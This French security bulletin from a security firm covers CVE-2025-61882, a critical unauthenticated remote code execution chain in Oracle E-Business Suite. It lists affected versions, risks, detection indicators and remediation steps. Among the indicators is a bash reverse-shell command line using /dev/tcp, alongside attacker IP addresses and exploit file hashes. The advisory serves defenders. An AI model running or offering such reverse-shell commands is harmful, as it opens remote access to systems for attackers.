Bulletins de Sécurité

Vous êtes confronté à un cyber-incident ?

Notre équipe est à votre disposition en 24/7 au 01 85 09 12 35 et par email cert@login-securite.com

Vulnérabilité critique dans Oracle E-Business Suite

Score CVSS :
9,8
Date de publication :
6/10/2025
Date de dernière mise à jour :
6/10/2025
vulnerability icon thumbnail logy cybersecurity

Produits concernés

• Oracle E-Business Suite, versions 12.2.3 à 12.2.14

Prérequis

• Accès réseau à la solution EBS

Risques

• Exécution de code arbitraire

• Accès au réseau interne de l’entreprise

• Déploiement de malware sur l’actif

• Exfiltration de données

Résumé

Oracle a publié un avis de sécurité sur une vulnérabilité critique affectant sa solutions E-Business Suite. Le niveau de criticité de cette vulnérabilité est de 9.8 (CVSSv3.1).

La CVE-2025-61882 permet à un attaquant distant non authentifié d’exécuter du code arbitraire via une chaîne d’exploitation combinant plusieurs vulnérabilités (SSRF, injection CRLF, contournement d’authentification). L’attaque conduit à l’exécution d’un document XSL malveillant permettant ainsi de compromettre l’actif vulnérable.

L’exploitation de cette CVE pourrait permettre à l’attaquant à minima une compromission complète du système (exécution de commande, latéralisation) ainsi que de l’exfiltration de données sensibles.

Cette vulnérabilité a déjà été identifiée comme ayant été exploitée par au moins un groupe de Ransomware. De plus, des scripts d’exploitation sont disponibles publiquement.

Étant donné le risque associé, nous préconisons de corriger cette vulnérabilité sans plus attendre.

Solutions

Détection de la compromission :

Afin de vérifier si un équipement est compromis, Oracle a fourni plusieurs indicateurs de compromission :

• 200[.]107[.]207[.]26

• 185[.]181[.]60[.]11

• sh -c /bin/bash -i >& /dev/tcp// 0>&1

• 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d (oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip)

• aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 (oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py)

• 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b (oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py)

D'autres recommandations ont été fournies par Crowdstrike :

• Recherche de template malveillant dans xdo_templates_vl

• Investigation des sessions suspectes UserID 0 (sysadmin) et UserID 6 (guest) dans icx_sessions

Remédiation :

Appliquer le correctif fourni par Oracle (voir les références ci-dessous).

Notez que la mise à jour du correctif critique d'octobre 2023 est une condition préalable à l'application des mises à jour de cette alerte de sécurité.

Mitigations :

Envisagez de désactiver temporairement l'accès à Internet pour les services Oracle EBS exposés.

Références

https://www.oracle.com/security-alerts/alert-cve-2025-61882.html

https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/

https://www.crowdstrike.com/en-us/blog/crowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882/

Restez informés des dernières menaces !

Recevez les alertes de sécurité critiques et nos conseils pour protéger votre entreprise.

Merci pour votre inscription !
Oups ! Une erreur est survenue lors de l'envoi du formulaire.
Nos offresNos ExpertisesLe groupe Constellation
Notre équipeNous rejoindreBlog
Urgences CyberInformations SOCCommander un Test d'Intrusion
Conditions Générales de VentesMentions légalesNous contacter
©2024 Login Sécurité | Mentions légales et Politique de confidentialité